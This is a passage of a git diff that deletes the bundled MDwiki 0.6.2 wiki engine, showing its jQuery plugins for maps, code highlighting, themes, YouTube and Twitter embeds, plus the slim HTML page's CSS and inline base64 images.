-            // this is a fallback for interoperability
-            originwrite.apply( document, arguments );
-        }
-    }
-
-    // method invocation - from jQuery.com
-    $.fn[pluginName] = function( method ) {
-
-        if ( methods[method] ) {
-            return methods[ method ].apply( this, Array.prototype.slice.call( arguments, 1 ));
-
-        } else if ( typeof method === 'object' || ! method ) {
-            return methods.init.apply( this, arguments );
-
-        } else {
-            $.error( 'Method ' +  method + ' does not exist on jQuery.lazygist' );
-        }
-    };
-
-    // expose version for your interest
-    $.fn[pluginName].version = version;
-
-})(jQuery, window, document);
-
-// ugly, but the google loader requires the callback fn
-// to be in the global scope
-var googlemapsLoadDone;
-
-function googlemapsReady() {
-    googlemapsLoadDone.resolve();
-}
-
-(function($) {
-    //'use strict';
-    var scripturl = 'http://maps.google.com/maps/api/js?sensor=false&callback=googlemapsReady';
-
-    function googlemaps($links, opt, text) {
-        var $maps_links = $links;
-        var counter = (new Date()).getTime ();
-        return $maps_links.each(function(i,e) {
-            var $link = $(e);
-            var default_options = {
-                zoom: 11,
-                marker: true,
-                scrollwheel: false,
-                maptype: 'roadmap'
-            };
-            var options = $.extend({}, default_options, opt);
-            if (options.address === undefined) {
-                options.address = $link.attr ('href');
-            }
-            var div_id = 'google-map-' + Math.floor (Math.random() * 100000);
-            var $mapsdiv = $('<div class="md-external md-external-nowidth" id="' + div_id + '"/>');
-            /* TODO height & width must be set AFTER the theme script went through
-            implement an on event, maybe?
-            if (options["width"] !== undefined) {
-                $mapsdiv.css('width', options["width"] + "px");
-                options["width"] = null;
-            }
-            if (options["height"] !== undefined) {
-                $mapsdiv.css('height', options["height"] + "px");
-                options["height"] = null;
-            }
-            */
-            $link.replaceWith ($mapsdiv);
-            // the div is already put into the site and will be formated,
-            // we can now run async
-            set_map (options, div_id);
-        });
-    }
-    function set_map(opt, div_id) {
-
-        // google uses rather complicated mapnames, we transform our simple ones
-        var mt = opt.maptype.toUpperCase ();
-        opt.mapTypeId = google.maps.MapTypeId[mt];
-        var geocoder = new google.maps.Geocoder ();
-
-        // geocode performs address to coordinate transformation
-        geocoder.geocode ({ address: opt.address }, function (result, status) {
-            if (status !== 'OK') {
-                return;
-            }
-
-            // add the retrieved coords to the options object
-            var coords = result[0].geometry.location;
-
-            var options = $.extend({}, opt, { center: coords  });
-            var gmap = new google.maps.Map(document.getElementById(div_id), options);
-            if (options.marker === true) {
-                var marker = new google.maps.Marker ({ position: coords, map : gmap});
-            }
-        });
-    }
-
-    var googleMapsGimmick = {
-        name: 'googlemaps',
-        version: $.md.version,
-        once: function() {
-            googlemapsLoadDone = $.Deferred();
-
-            // register the gimmick:googlemaps identifier
-            $.md.linkGimmick(this, 'googlemaps', googlemaps);
-
-            // load the googlemaps js from the google server
-            $.md.registerScript(this, scripturl, {
-                license: 'EXCEPTION',
-                loadstage: 'skel_ready',
-                finishstage: 'bootstrap'
-            });
-
-            $.md.stage('bootstrap').subscribe(function(done) {
-                // defer the pregimmick phase until the google script fully loaded
-                if ($.md.triggerIsActive('googlemaps')) {
-                    googlemapsLoadDone.done(function() {
-                        done();
-                    });
-                } else {
-                    // immediately return as there will never a load success
-                    done();
-                }
-            });
-        }
-    };
-    $.md.registerGimmick(googleMapsGimmick);
-}(jQuery));
-
-(function($) {
-    var highlightGimmick = {
-        name: 'highlight',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                highlight();
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(highlightGimmick);
-
-
-    function highlight () {
-        // marked adds lang-ruby, lang-csharp etc to the <code> block like in GFM
-        var $codeblocks = $('pre code[class^=lang-]');
-        return $codeblocks.each(function() {
-            var $this = $(this);
-            var classes = $this.attr('class');
-            // TODO check for other classes and only find the lang- one
-            // highlight doesnt want a lang- prefix
-            var lang = classes.substring(5);
-            $this.removeClass(classes);
-            $this.addClass(lang);
-            var x = hljs.highlightBlock($this[0]);
-        });
-    }
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var iframeGimmick= {
-        name: 'iframe',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'iframe', create_iframe);
-        }
-    };
-    $.md.registerGimmick(iframeGimmick);
-
-    function create_iframe($links, opt, text) {
-        return $links.each (function (i, link){
-            var $link = $(link);
-            var href = $link.attr('href');
-            var $iframe = $('<iframe class="col-md-12" style="border: 0px solid red; height: 650px;"></iframe>');
-            $iframe.attr('src', href);
-            $link.replaceWith($iframe);
-
-            if (opt.width)
-                $iframe.css('width', opt.width);
-            if (opt.height)
-                $iframe.css('height', opt.height);
-            else {
-                var updateSizeFn = function () {
-                    var offset = $iframe.offset();
-                    var winHeight = $(window).height();
-                    var newHeight = winHeight - offset.top - 5;
-                    $iframe.height(newHeight);
-                };
-
-                $iframe.load(function(done) {
-                    updateSizeFn();
-                });
-
-                $(window).resize(function () {
-                    updateSizeFn();
-                });
-            }
-
-        });
-    }
-}(jQuery));
-
-(function($) {
-    var mathGimmick = {
-        name: 'math',
-        once: function() {
-            $.md.linkGimmick(this, 'math', load_mathjax);
-        }
-    };
-    $.md.registerGimmick(mathGimmick);
-
-    function load_mathjax($links, opt, ref) {
-        $links.remove();
-        var script = document.createElement('script');
-        script.type = 'text/javascript';
-        script.src  = $.md.prepareLink('cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML', { forceHTTP: true });
-        document.getElementsByTagName('head')[0].appendChild(script);
-    }
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var themes = [
-        { name: 'bootstrap', url: 'netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css' },
-        { name: 'amelia', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/amelia/bootstrap.min.css' },
-        { name: 'cerulean', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cerulean/bootstrap.min.css' },
-        { name: 'cosmo', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cosmo/bootstrap.min.css' },
-        { name: 'cyborg', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/cyborg/bootstrap.min.css' },
-        { name: 'flatly', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/flatly/bootstrap.min.css' },
-        { name: 'journal', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/journal/bootstrap.min.css' },
-        { name: 'readable', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/readable/bootstrap.min.css' },
-        { name: 'simplex', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/simplex/bootstrap.min.css' },
-        { name: 'slate', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/slate/bootstrap.min.css' },
-        { name: 'spacelab', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/spacelab/bootstrap.min.css' },
-        { name: 'united', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.0/united/bootstrap.min.css' },
-        { name: 'yeti', url: 'netdna.bootstrapcdn.com/bootswatch/3.0.2/yeti/bootstrap.min.css' }
-    ];
-    var useChooser = false;
-    var themeChooserGimmick = {
-        name: 'Themes',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'themechooser', themechooser, 'skel_ready');
-            $.md.linkGimmick(this, 'theme', apply_theme);
-
-        }
-    };
-    $.md.registerGimmick(themeChooserGimmick);
-
-    var log = $.md.getLogger();
-
-    var set_theme = function(theme) {
-        theme.inverse = theme.inverse || false;
-
-        if (theme.url === undefined) {
-            if (!theme.name) {
-                log.error('Theme name must be given!');
-                return;
-            }
-            var saved_theme = themes.filter(function(t) {
-                return t.name === theme.name;
-            })[0];
-            if (!saved_theme) {
-                log.error('Theme ' + name + ' not found, removing link')    ;
-                return;
-            }
-            theme = $.extend(theme, saved_theme);
-        }
-
-
-        $('link[rel=stylesheet][href*="netdna.bootstrapcdn.com"]')
-            .remove();
-
-        // slim instance has no bootstrap hardcoded in
-        var has_default_bootstrap_css = $('style[id*=bootstrap]').length > 0;
-
-        if (theme.name !== 'bootstrap' || !has_default_bootstrap_css) {
-            // in devel & fat version the style is inlined, remove it
-            $('style[id*=bootstrap]').remove();
-
-            $('<link rel="stylesheet" type="text/css">')
-                .attr('href', $.md.prepareLink(theme.url))
-                .appendTo('head');
-        }
-
-        if (theme.inverse === true) {
-            $('#md-main-navbar').removeClass ('navbar-default');
-            $('#md-main-navbar').addClass ('navbar-inverse');
-        } else {
-            $('#md-main-navbar').addClass ('navbar-default');
-            $('#md-main-navbar').removeClass ('navbar-inverse');
-        }
-    };
-
-    var apply_theme = function($links, opt, text) {
-        opt.name = opt.name || text;
-        $links.each(function(i, link) {
-            $.md.stage('postgimmick').subscribe(function(done) {
-                var $link = $(link);
-
-                // only set a theme if no theme from the chooser is selected,
-                // or if the chooser isn't enabled
-                if (window.localStorage.theme === undefined || !useChooser) {
-                    set_theme(opt);
-                }
-
-                done();
-            });
-        });
-        $links.remove();
-    };
-
-    var themechooser = function($links, opt, text) {
-
-        useChooser = true;
-        $.md.stage('bootstrap').subscribe(function(done) {
-            restore_theme(opt);
-            done();
-        });
-
-        return $links.each(function(i, e) {
-            var $this = $(e);
-            var $chooser = $('<a href=""></a><ul></ul>'
-            );
-            $chooser.eq(0).text(text);
-
-            $.each(themes, function(i, theme) {
-                var $li = $('<li></li>');
-                $chooser.eq(1).append($li);
-                var $a = $('<a/>')
-                    .text(theme.name)
-                    .attr('href', '')
-                    .click(function(ev) {
-                        ev.preventDefault();
-                        window.localStorage.theme = theme.name;
-                        window.location.reload();
-                    })
-                    .appendTo($li);
-            });
-
-            $chooser.eq(1).append('<li class="divider" />');
-            var $li = $('<li/>');
-            var $a_use_default = $('<a>Use default</a>');
-            $a_use_default.click(function(ev) {
-                ev.preventDefault();
-                window.localStorage.removeItem('theme');
-                window.location.reload();
-            });
-            $li.append($a_use_default);
-            $chooser.eq(1).append($li);
-
-            $chooser.eq(1).append('<li class="divider" />');
-            $chooser.eq(1).append('<li><a href="http://www.bootswatch.com">Powered by Bootswatch</a></li>');
-            $this.replaceWith($chooser);
-        });
-    };
-
-    var restore_theme = function(opt) {
-        if (window.localStorage.theme) {
-            opt = $.extend({ name: window.localStorage.theme }, opt);
-            set_theme(opt);
-        }
-    };
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    // no license information given in the widget.js -> OTHER
-    var widgetHref = $.md.prepareLink('platform.twitter.com/widgets.js');
-    var twitterscript = '!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="' + widgetHref + '";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");';
-    var twitterGimmick = {
-        name: 'TwitterGimmick',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'twitterfollow', twitterfollow);
-
-            $.md.registerScript(this, twitterscript, {
-                license: 'EXCEPTION',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-
-        }
-    };
-    $.md.registerGimmick(twitterGimmick);
-
-	var twitterfollow = function($links, opt, text) {
-		return $links.each(function(i, link) {
-			var $link = $(link);
-			var user;
-			var href = $link.attr('href');
-			if (href.indexOf ('twitter.com') <= 0) {
-				user = $link.attr('href');
-				href = $.md.prepareLink('twitter.com/' + user);
-			}
-			else {
-				return;
-			}
-			// remove the leading @ if given
-			if (user[0] === '@') {
-				user = user.substring(1);
-			}
-			var twitter_src = $('<a href="' + href + '" class="twitter-follow-button" data-show-count="false" data-lang="en" data-show-screen-name="false">'+ '@' + user + '</a>');
-			$link.replaceWith (twitter_src);
-		});
-    };
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    var youtubeGimmick = {
-        name: 'youtube',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                youtubeLinkToIframe();
-                done();
-            });
-        }
-    } ;
-    $.md.registerGimmick(youtubeGimmick);
-
-    function youtubeLinkToIframe() {
-        var $youtube_links = $('a[href*=youtube\\.com]:empty, a[href*=youtu\\.be]:empty');
-
-        $youtube_links.each(function() {
-            var $this = $(this);
-            var href = $this.attr('href');
-            if (href !== undefined) {
-                // extract the v parameter from youtube
-                var exp = /.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/;
-                var m = href.match(exp);
-
-                if (m && m[1].length === 11) {
-                    // insert the iframe
-                    var short_handle = m[1];
-                    var frame = $('<iframe class="md-external" frameborder="0" allowfullscreen></iframe>');
-                    frame.attr('src', 'http://youtube.com/embed/' + short_handle);
-                    // remove the a tag
-                    $this.replaceWith(frame);
-
-                }
-            }
-        });
-    }
-}(jQuery));
-
-(function($) {
-    'use strict';
-    function yuml($link, opt, text) {
-        var default_options = {
-            type: 'class',  /* { class, activity, usecase } */
-            style: 'plain', /* { plain, scruffy } */
-            direction: 'LR',      /* LR, TB, RL */
-            scale: '100'
-        };
-        var options = $.extend ({}, default_options, opt);
-
-        return $link.each(function(i,e) {
-
-            var $this = $(e);
-            var url = 'http://yuml.me/diagram/';
-            var data = $this.attr('href');
-            var title = $this.attr('title');
-
-            title = (title ? title : '');
-
-            /* `FOOBAR´ => (FOOBAR) */
-            data = data.replace( new RegExp('`', 'g'), '(' ).replace( new RegExp('´', 'g'), ')' );
-
-            url += options.style + ';dir:' + options.direction + ';scale:' + options.scale + '/' + options.type + '/' + data;
-
-            var $img = $('<img src="' + url + '" title="' + title + '" alt="' + title + '">');
-
-            $this.replaceWith($img);
-        });
-    }
-    var yumlGimmick = {
-        name: 'yuml',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'yuml', yuml);
-            $.md.registerScript(this, '', {
-                license: 'LGPL',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-        }
-    };
-    $.md.registerGimmick(yumlGimmick);
-
-}(jQuery));
-</script>
-<!-- END dist/MDwiki.js -->
-<script type="text/javascript">$.md.logThreshold = $.md.loglevel.DEBUG;</script>
-</head>
-<body>
-    <noscript>
-        This website requires Javascript to be enabled. Please turn on Javascript
-        and reload the page.
-    </noscript>
-
-    <div id="md-all">
-    </div>
-</body>
-</html>
diff --git a/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim.html b/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim.html
deleted file mode 100755
index a88a5010..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim.html
+++ /dev/null
@@ -1,187 +0,0 @@
-<!DOCTYPE html>
-<html>
-<!--
-   This is MDwiki v0.6.2
-   (C) 2013 by Timo Dörr and contributors. This software is licensed
-   under the terms of the GNU GPLv3 with additional terms applied.
-   See https://github.com/Dynalon/mdwiki/blob/master/LICENSE.txt for more detail.
-   See http://github.com/Dynalon/mdwiki for a copy of the source code.
--->
-<head>
-    <title>MDwiki</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta name="fragment" content="!">
-    <link rel="shortcut icon" type="image/x-icon" href="favicon.png" />
-    <meta charset="UTF-8">
-    <style type="text/css">
-    /* hide the main content while we assemble everything */
-    .md-hidden-load { display: none; }
-
-    .anchor-highlight {
-        font-size: 0.7em;
-        margin-left: 0.25em;
-    }
-    /* for pageContentMenu */
-    #md-page-menu {
-            position: static;
-    }
-    #md-page-menu a.active {
-        /* background-color: rgba(0, 0, 0, 0.01); */
-        font-weight: bold;
-        padding-left: 6px;
-
-    }
-    @media (min-width: 992px) {
-        #md-page-menu.affix {
-            position: fixed;
-        }
-    }
-    @media (min-width: 768px) {
-        .md-float-left .col-sm-8, .md-float-right .col-sm-8 {
-            max-width: 66.67%;
-        }
-        .md-float-left .col-sm-4, .md-float-right .col-sm-4  {
-            max-width: 33.33%;
-        }
-        .md-float-left .col-sm-2, .md-float-right .col-sm-2 {
-            max-width: 16.67%;
-        }
-
-    }
-    @media (max-width: 992px) {
-        a.forkmeongithub {
-            display: none;
-        }
-    }
-    @media (max-width: 768px) {
-        /* don't use floating for smaller screens */
-        .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-        .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-    }
-
-    .md-floatenv .md-text {
-        /* md-text is not of md-col-* but needs the spacing */
-        margin-left: 15px;
-        margin-right: 15px;
-    }
-
-    /* float images */
-    .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-        width: auto;
-    }
-    .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-        float: right !important;
-        width: auto;
-    }
-    #md-all .md-copyright-footer {
-        background-color: !important;
-        font-size: smaller;
-        padding: 1em;
-    }
-    </style>
-
-<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" type="text/css"></link>
-<link rel="stylesheet" href="//yandex.st/highlightjs/7.3/styles/github.min.css" type="text/css"></link>
-<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
-<script type="text/javascript" src="//netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
-<script type="text/javascript" src="//yandex.st/highlightjs/7.3/highlight.min.js"></script>
-<!-- START extlib/css/colorbox.css -->
-<style id="style:extlib/css/colorbox.css">/*
-    ColorBox Core Style:
-    The following CSS is consistent between example themes and should not be altered.
-*/
-#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
-#cboxOverlay{position:fixed; width:100%; height:100%;}
-#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
-#cboxContent{position:relative;}
-#cboxLoadedContent{overflow:auto;}
-#cboxTitle{margin:0;}
-#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}
-#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
-.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none;}
-.cboxIframe{width:100%; height:100%; display:block; border:0;}
-#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box;}
-
-/*
-    User Style:
-    Change the following styles to modify the appearance of ColorBox.  They are
-    ordered & tabbed in a way that represents the nesting of the generated HTML.
-*/
-#cboxOverlay{background:#000;}
-
-#colorbox{}
-
-        #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
-        #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
-
-        #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background-repeat: no-repeat; background-position: 0px 0px; width:23px; height:23px; text-indent:-9999px;}
-        #cboxPrevious{left:0px; background-position: -51px -25px;}
-        #cboxPrevious:hover{background-position:-51px 0px;}
-        #cboxNext{left:27px; background-position:-75px -25px;}
-        #cboxNext:hover{background-position:-75px 0px;}
-        #cboxClose{right:0; background-position:-100px -25px;}
-        #cboxClose:hover{background-position:-100px 0px;}
-
-        .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
-        .cboxSlideshow_on #cboxSlideshow:hover{background-position:-150px 0px;}
-        .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
-        .cboxSlideshow_off #cboxSlideshow:hover{background-position:-125px 0px;}
-
-/* begin inline customizing */
-
-    #cboxBottomCenter{height:43px; background-repeat: repeat-x; background-position: bottom left;}
-    #cboxTopCenter{height:14px; background-repeat: repeat-x; background-position: top left;}
-
-    #cboxBottomCenter, #cboxTopCenter {background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAABLCAMAAACGCB2xAAAAM1BMVEVSUlJHR0dPT09BQUFLS0tQUFA6OjpgYGCKioozMzPS0tJaWlpRUVHy8vKJiYn////m5eV3dK93AAAAK0lEQVR4XqXBhQ2AQBAAsJ48bvtPywyE1GLGYUgtlPuT0+b5abealNDScL0YiAPSV/RH9wAAAABJRU5ErkJggg==);}
-
-    #cboxTopLeft, #cboxTopRight, #cboxBottomLeft, #cboxBottomRight, #cboxMiddleLeft,
-
-    #cboxMiddleRight, #cboxContent,#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow {
-        background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOEAAABLCAMAAACx6hDAAAABj1BMVEVPT0/e3t7b29vS0tK7urq5uLjq6uqZmZmSkpJaWlrU1NTj4+PFxcWvr6+goKBbW1u3t7c9PT27u7vCwsKsrKxiYWGqqqq5ublbWlpeXV2Xl5fExMSbmpq6ubmNjY18fHzy8vIrKystLS0sLCxNTU0uLi4wMDDNzc05OTns6+vl5eUvLy/q6ekqKipMTExDQ0M4ODgyMjI2NjbZ2dk6OjrY2NjMzMxLS0vAwMBCQkLo5+dHR0cxMTFKSkpBQUHv7u43NzdISEhFRUVRUVHx8fE7Ozs8PDwzMzNJSUnp6elGRkZQUFDr6upeXl7t7e1gYGCoqKjv7+81NTWKiorn5uZERESCgoJdXV3p6OhOTk51dXVAQEA+Pj6np6fu7e2+vr5cXFxSUlKJiYnOzs7s7OxTU1P29vbw8PB2dnZfX1/m5eV4eHifn59qamqmpqbQ0NCOjo7Kysqzs7P4+PiDg4Otra3z8/M/Pz80NDSrq6u/v7/Pz890dHRpaWmBgYH5+fn08/NoaGjPzs7///+ioqIRuwm9AAAGHUlEQVR4XsTXZY/jPBAA4PwUQxjKzMzLjMfMzPfiD7+xm23ibjZVu5u7+VBL7ljyI3scW9pZOv59+gdjZ+NOeyzlyzXtv9B408/Uynlp3L4r7bzYWC5E4a4xvAQYGkEA2/DG2GL6biBmHbGoz9pVhTBkuRCEhx0TzVNKKNspBczXdHtLnTRa9yC78MdhAND+6xaLh3+7bf1mhO3guEpooJfbaH56h2i7gOx5oCmlckBkwFzqGIi+9LdocllofMSUUnzrndui6wo5bnxVzJyC8BztO06A0HFeM4IIxLgBRAZsYAeI/vSf6DxASAkhFIS8vbaQ6aSw4ExBWNoyDyjFAUKM6Q9zy1ddEwBSSnStY3c0ncCo78j2px+YW6VLQqIoCgEhb68p5L4jWY6xyIsR4yHLgASiJ4S5JohCaICQQn8756suI5vC0KlkNKRlFBiEU9mJkN7KdYaRCpkvVh00y8HRbA6qMZkRZ8L7aJMolmUpiMe6u215ENafOEPe6Qlbk0K22tvoqTCGwob1lpyn0zN0PzIhB8aqzdFevFgLjGJ8b9TMA3EmrJuPAaiqqvVgbe3g9rFp8834z+2DtbUHvF8h+151QfUliKVWWKgWSUBFekI3/TGqzwstV2jdgFCulj+EjfhSbLlEELIDv82A0wmzXffVYJMqOBTcLkQhrLo8om5VkhAg1BnQE16kt81HpWiEfAmb/4cPeV5rDWKu8BAVGpRJ2IQ5ERemQsy73X6+GXdnRK1bSfb7/WSlqwHQJ/TSCyD3hIorVG5CKFdHr8KF907j5ao8FRppBxMFgDDfpCgkU/i0n2DHq0UbPXGFz5AtHEy+9KwRkRCWMP4tXKhlTlpVWZqtIVBAEryGSRYBa6jyP9T5NfTSYQ0j2qVH+XLx3gJh4nRvEAPh3Ys6nNUbq8OCWIccLtahlpmdNLom1qGb3k5HVofSUX5UWyDMpXpxVoggdM9SIPrO0olwllZUAL4XzlId6NOwFF08S3l6hGcpO2iqrZNFwu1esRljQ0K+h3XEg/frm8L3MEEU6O4+gR9Y9IT/e8jTyWYE30NB+Gk5Ib/T6ErInUbzXVKMdAMTCF1Dmk4gcCM9d6dh6RELtQXCz11BGHovpYH3UgorZ8NqUhh1jGx/evC9FOQg5O1vFa72thj73xZ47m2xv9LbInqh+D4MffABUeLAp5wYwfswEiHEcKU3fnalN37kwl/s2M9LAkEUB/C0ml12VgmKLh2+cwtBOkWRUdIvIpJayYNdgkIIukUDdYz8x2tnt96OjQMS8hbzexFhDn6QN2/eIyHTnoZByJD/KJwL58L5TdM/FY5uIZ3dQvx0C2l3C+HuFsNKmuF7/tlm6vixdnR8vfm744tQV/OOX9UJEen4SBpDpKm85J9Mr7Ya4BACK4ZgAYGUaICAIdLxmroro7DVFQHGCFEX1ss7BRpi0wBTYrN4PBDdVumE5reOFSKsFqcnqZERVQaElh3r+A0dn5pwQ3mzOiIcqBgmjo1wZoiLE/A3LEBOLUzAMInVYMrCtUVv1m1hWyTIEgZfSYTZCIt6+iVEFqqurPoopiJHhEhUe7rCpSdvlkloLvwQViKziYpAoeoiogNIQoTysVUSYV9FGl4hUXoWkYAOIXREcl5hQwJeIaW4EQ4A0D3qEAKyMfP/YW+261Aw16H/Lu3MyF36936o6Qpy9ENW4eRvmv6kbxpmIcO7lEHIMFuwCf3zYaSaE8+H/EL2GZ9BWOY9zWc7d+wSMQzFcbzDCTqVCnJ3ok4HdrpAKZRSWnInicUOQiVISYeem25O6Xz+4/YJWaokg8Px4P3+gw/p+L79p/AkQyEkIQlJSEISkpCEJCQhCUmofcJWIhXa+1KfcJlIBsIDSmEzCatLt/CW96pGLNzu2LlbeBcbe+eNURhs6r2+cQGvuczhVh+tsMsK1qdX769DuLqYLQyHdc+lht4CqfDnMy0LZmScjI+/N7Y8llpNT4hYGABRVSYSIp1PCBmZygJRCn1pV87UHsKurnnAK3Tnebu6zCDOgydEKZwnlts/+srOBpY4hdbYOBtZACIWghHm7JyRCu3efEP6T4Vv0sK5wmQ8JLkAAAAASUVORK5CYII=);
-    }
-
-    #cboxTopLeft{width:14px; height:14px; background-repeat: no-repeat; background-position: 0 0;}
-    #cboxTopRight{width:14px; height:14px; background-repeat: no-repeat; background-position: -36px 0;}
-    #cboxBottomLeft{width:14px; height:43px; background-repeat: no-repeat; background-position: 0 -32px;}
-    #cboxBottomRight{width:14px; height:43px;  background-repeat: no-repeat; background-position: -36px -32px;}
-    #cboxMiddleLeft{width:14px; background-repeat: repeat-y; background-position: -175px 0;}
-    #cboxMiddleRight{width:14px; background-repeat: repeat-y; background-position: -211px 0;}
-    #cboxContent{background:#fff; overflow:visible;}
-
-
-
-        .cboxIframe{background:#fff;}
-        #cboxError{padding:50px; border:1px solid #ccc;}
-        #cboxLoadedContent{margin-bottom:5px;}
-        #cboxLoadingOverlay{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoBAMAAAB+0KVeAAAAElBMVEX///////////8AAAD///////9H1zSfAAAABXRSTlPvgBAAz5JLnNUAAAA+SURBVHhe7dMhAQAgEEPRIfAYEkCCi0ACEOtfBc8WAHFfPr0hGp/KwKS00BUPquIGTZ9gYqIdrZ23PYK9zAX6sAYavSqAMgAAAABJRU5ErkJggg==);
-         background-repeat: no-repeat; background-position: center center;}
-        #cboxLoadingGraphic{background: url(data:image/gif;base64,R0lGODlhIAAgAPYAAP////9VAP77+v7j1v7m2v78/P7Quv6qgP6wiv7UwP749v7v6P6viP6ofv6/oP7u5v6fcP6LUv6rgv7s5P728v6nfP7Aov7Irv54Nv57Ov5/QP6bav7n3P739P6mev7Dpv76+P7ayP58PP6cbP7w6v6+nv6keP7Tvv7g0v53NP56OP7HrP7Yxv7czP7z7v7i1P50MP7MtP7SvP7EqP708P6ebv62kv7k2P7r4v6uhv5gEv5fEP5sJP5eDv5zLv67mv7q4P7o3v7y7P7KsP68nP64lv6WYv6zjv63lP6DRv6HTP6KUP6CRP6GSv60kP7ezv6ESP6AQv7f0P7Wwv6ITv66mP5mGv5vKP52Mv5jFv5iFP7PuP6QWv6MVP7CpP6gcv6PWP6TXv6XZP6SXP6OVv5rIv5qIP5oHv5wKv7byv7XxP6aaP7Otv6YZv5yLP7Gqv5kGP6UYP5nHP6idP6jdv7Lsv5uJv6shP5+Pv6yjP5cDAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJBQAAACwAAAAAIAAgAAAH/4AAgoOEhYaHiImKi4yNjo+QkZKECzk2NJOCDxchgwU1OjsSmQoQGCIWghQiOz01npALERkYGQ4AFBqtP4ILN0ACjgISGhkpGDIANjw+KABCKNEujxMbGiowowAEHIIT0SgUkBwjGiIzhkIvKDiSJCsxwYYdmI8KFB0FjfqLAgYMEiSUEJeoAJABBAgiGnCgQQUPJlgoIgGuWyICCBhoRNBCEbRoFhEVSODAwocTIBQVwEEgiMJEChSkzNTPRQdEFF46KsABxYtphUisAxLpW7QJgkDMxAFO5yIC0V5gEjrg5kcUQB098ElCEFQURAH4CiLvEQUFg25ECwKLpiCmKBC6ui0kYILcuXjz6t3Ld1IgACH5BAkFAAAALAAAAAAgACAAAAf/gACCg4SFhoeIiYqLjI2Ohw8Tj44XKlhbk4sKEVZZXAWZgwsxLYMdTJ1RCqEAIA1JSjOCFKhaUSCCoI8kRkpMULIKVFZaXaALN0C6jAVHS01RTFMAVVc8XgBCKNsujwsmS1AaCIJSpQAT2ygUk0AeS0oXhkIvKDihQjEyy4QdNJMgOqxqxC9RCyJFkKwYiKgAkAEE2CWi4CChDSdSFJFQx0ERiCEWQlq4oUjbto6KgCQwIOOJAEUFcBAIInGRgIKsGrrogIhCzUcFgqB40a0QiXpAMj1QJ6kVLgA41P1kxGHbi39HB/A0iaKoo6MvSAgisC0pAGRBXk4SOOjGtiCDFXCGSodCSM6GC7ze3cu3r9+/gAcFAgAh+QQJBQAAACwAAAAAIAAgAAAH/4AAgoOEhYaHiImKi4yNjoYkTj8Uj40SPGUMlYsdSzxmSiCbg0IyKIM0TTxnTAqjACAIYGNDgh1Uq1CiAB2VLl9hZGAXsGSrXAUKEjNABY4FRGJjXV0sAD8+aB8ANmItKC6PJAxiXBFIAAIhIYJVUygolI8TCNIxhkAvKDijLidTzgx1oLEJxC5GAReRkLFixZSDhwo